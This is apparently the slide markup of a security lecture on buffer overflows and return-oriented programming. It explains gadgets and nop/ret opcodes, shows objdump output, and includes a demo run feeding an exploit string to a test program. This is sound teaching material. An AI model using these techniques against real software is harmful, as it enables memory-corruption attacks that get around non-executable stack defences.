                          <a:pt x="2863098" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2730885" y="1992116"/>
                          <a:pt x="2642494" y="1942004"/>
                          <a:pt x="2480987" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2319480" y="2028728"/>
                          <a:pt x="2193233" y="1926884"/>
                          <a:pt x="1910673" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1628113" y="2043848"/>
                          <a:pt x="1622411" y="1985023"/>
                          <a:pt x="1465827" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1309243" y="1985709"/>
                          <a:pt x="973313" y="1981109"/>
                          <a:pt x="832778" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="692243" y="1989623"/>
                          <a:pt x="520796" y="1972351"/>
                          <a:pt x="330901" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="141759" y="2005287"/>
                          <a:pt x="-6142" y="1817876"/>
                          <a:pt x="0" y="1654465"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-37043" y="1465497"/>
                          <a:pt x="48882" y="1354599"/>
                          <a:pt x="0" y="1213277"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-48882" y="1071955"/>
                          <a:pt x="20055" y="950395"/>
                          <a:pt x="0" y="798560"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-20055" y="646725"/>
                          <a:pt x="13033" y="517708"/>
                          <a:pt x="0" y="33090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back-again-</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err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
          </a:p>
          <a:p>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Program received signal SIGSEGV, Segmentation fault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x00007fffffffdff8 in ?? ()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381763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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>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vertic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DFDFAB-5CC7-8440-B98D-438DBDB6BA02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Counter-countermeasure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return-Oriented Programming (ROP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5921A6A-E31F-374E-B7A3-57FC40D4D188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Marking stack as non-executable does not prevent an attacker from changing the return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return address can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> memory address with the “executable” bit set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(note: cannot overcome stack canary)</a:t>
            </a:r>
          </a:p>
          <a:p>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Rounded Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C56FF9C6-5FD4-BC46-92FA-2EA92D86F06F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571749" y="2672785"/>
            <a:ext cx="7048502"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textbook-code/chap11&gt; ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string.raw</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Enter a string:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Buffer at 0x7fffffffdff8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hello, World!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Did not return to caller! (insert maniacal laugh here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129135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Return-Oriented Programming</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3428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341453-393F-7D4E-B67C-8C7F29FF98F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ROP Concept</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722B8995-78C2-4F4B-A11A-011D793A59C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If attacker cannot inject new code, then use existing code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code from application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code from libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: code of the form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful instruction(s), 0+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1597025" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x86:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0x90	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0xC3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	other multi-byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-equivalents exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1597025" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ARM:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0xD503201F	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0xD65F0000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Construct exploit string with gadgets’ addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After each gadget executes, “return” to next gadget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A026DF97-4671-4040-BED1-D61B7E103059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10632621" y="376819"/>
            <a:ext cx="1469984" cy="6191750"/>
            <a:chOff x="10632621" y="376819"/>
            <a:chExt cx="1469984" cy="6191750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22BCD516-F364-664A-A0F5-78B6A8DA4344}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10632621" y="5090313"/>
              <a:ext cx="1469984" cy="14782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2" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1309FD96-BF44-8649-838A-FA648F175A9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10632621" y="981413"/>
              <a:ext cx="1469984" cy="1157545"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="pct90">
              <a:fgClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:fgClr>
              <a:bgClr>
                <a:srgbClr val="00FA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3" name="Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95A616AD-AAF3-6F47-87AE-D8853C7132BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10632621" y="376819"/>
              <a:ext cx="1469984" cy="100623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Stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69EE38D2-9853-2343-AA8D-F6883F87DE9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10632621" y="2332678"/>
              <a:ext cx="1469984" cy="2236482"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="pct90">
              <a:fgClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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0DB1BC87-5400-F248-93CA-2FB0F1A2DB63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10632621" y="5595195"/>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“Text” </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(Executable Code)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF94B01-ECD4-0347-A455-BA3034AA4009}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10632621" y="4288202"/>
              <a:ext cx="1469984" cy="802110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1469984"/>
                <a:gd name="connsiteY0" fmla="*/ 0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0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497754 h 1758019"/>
                <a:gd name="connsiteX1" fmla="*/ 1469984 w 1469984"/>
                <a:gd name="connsiteY1" fmla="*/ 123681 h 1758019"/>
                <a:gd name="connsiteX2" fmla="*/ 1469984 w 1469984"/>
                <a:gd name="connsiteY2" fmla="*/ 1758019 h 1758019"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 1469984"/>
                <a:gd name="connsiteY3" fmla="*/ 1758019 h 1758019"/>
                <a:gd name="connsiteX4" fmla="*/ 13855 w 1469984"/>
                <a:gd name="connsiteY4" fmla="*/ 497754 h 1758019"/>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13855 w 1469984"/>
                <a:gd name="connsiteY0" fmla="*/ 374073 h 1634338"/>
                <a:gd name="connsiteX1" fmla="*/ 1469984 w 1469984"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1634338"/>
                <a:gd name="connsiteX2" fmla="*/ 1469984 w 1469984"/>
                <a:gd name="connsiteY2" fmla="*/ 1634338 h 1634338"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 1469984"/>
                <a:gd name="connsiteY3" fmla="*/ 1634338 h 1634338"/>
                <a:gd name="connsiteX4" fmla="*/ 13855 w 1469984"/>
                <a:gd name="connsiteY4" fmla="*/ 374073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193964 h 1634338"/>
                <a:gd name="connsiteX1" fmla="*/ 1469984 w 1469984"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1634338"/>
                <a:gd name="connsiteX2" fmla="*/ 1469984 w 1469984"/>
                <a:gd name="connsiteY2" fmla="*/ 1634338 h 1634338"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 1469984"/>
                <a:gd name="connsiteY3" fmla="*/ 1634338 h 1634338"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 1469984"/>
                <a:gd name="connsiteY4" fmla="*/ 193964 h 1634338"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1469984"/>
                <a:gd name="connsiteY0" fmla="*/ 217000 h 1657374"/>
                <a:gd name="connsiteX1" fmla="*/ 1469984 w 1469984"/>
                <a:gd name="connsiteY1" fmla="*/ 23036 h 1657374"/>
                <a:gd name="connsiteX2" fmla="*/ 1469984 w 1469984"/>
                <a:gd name="connsiteY2" fmla="*/ 1657374 h 1657374"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 1469984"/>
                <a:gd name="connsiteY3" fmla="*/ 1657374 h 1657374"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 1469984"/>
                <a:gd name="connsiteY4" fmla="*/ 217000 h 1657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984" h="1657374">
                  <a:moveTo>
                    <a:pt x="0" y="217000"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="734759" y="424818"/>
                    <a:pt x="846063" y="-115509"/>
                    <a:pt x="1469984" y="23036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1469984" y="1657374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1657374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2170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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Arrow Connector 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6307F30D-6B32-8444-93D1-A4725DCE1CC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="14" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11367613" y="4109545"/>
              <a:ext cx="0" cy="459615"/>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 name="Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2B388F-F386-C742-9147-A80737EC8496}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10632621" y="1906944"/>
              <a:ext cx="1469984" cy="7316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140"/>
                <a:gd name="connsiteX1" fmla="*/ 21600 w 21600"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 21140"/>
                <a:gd name="connsiteX2" fmla="*/ 21600 w 21600"/>
                <a:gd name="connsiteY2" fmla="*/ 17322 h 21140"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 21600"/>
                <a:gd name="connsiteY3" fmla="*/ 20172 h 21140"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 21600"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 2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40">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="17322"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11004" y="15436"/>
                    <a:pt x="10800" y="23922"/>
                    <a:pt x="0" y="20172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="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Heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E3A8F3B-52D8-AE45-AA1B-40CD1442757C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10632621" y="3088720"/>
              <a:ext cx="1469984" cy="7448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Shared Libraries</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Arrow Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77379779-9538-7840-9338-6411CF70E21B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="14" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11367613" y="2332678"/>
              <a:ext cx="0" cy="526136"/>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CEB325-0E54-9F40-ACA3-82B0BF431BF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="11353800" y="981413"/>
              <a:ext cx="13813" cy="556775"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:srgbClr val="00FA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2172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Gadget Sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9D057C-3B77-B64A-9271-9EA9651F74BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tail end of existing functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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0" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFD1C857-52D9-8242-99D4-0EA9143557F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6773524" y="1964809"/>
            <a:ext cx="2283510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -d has-target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78440AE-6EA5-3F44-8F79-A0BFEB6E1F8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2334141"/>
            <a:ext cx="8218834" cy="1205933"/>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0000000000400540 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>deregister_tm_clones</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400568:       5d                      pop    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rbp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  400569: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
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangle 11">
            <a:extLst>
